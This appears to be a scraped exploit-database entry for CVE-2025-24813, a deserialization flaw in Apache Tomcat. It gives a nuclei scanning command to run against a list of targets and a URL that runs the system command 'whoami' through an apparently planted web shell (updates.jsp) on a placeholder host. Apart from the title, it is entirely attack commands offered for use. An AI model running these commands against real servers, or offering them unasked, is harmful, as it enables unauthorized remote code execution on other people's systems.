Exploit for Deserialization of Untrusted Data in Apache Tomcat
Exploit Code
## https://sploitus.com/exploit?id=88A3232B-23B3-532D-A13F-C90347FA17A5
# CVE-2025-24813
Nuclei Template CVE-2025β24813
```
nuclei -l list.txt -t CVE-2025β24813.yaml
````
# execute shell
```
http://target.com/updates.jsp?cmd=whoami
```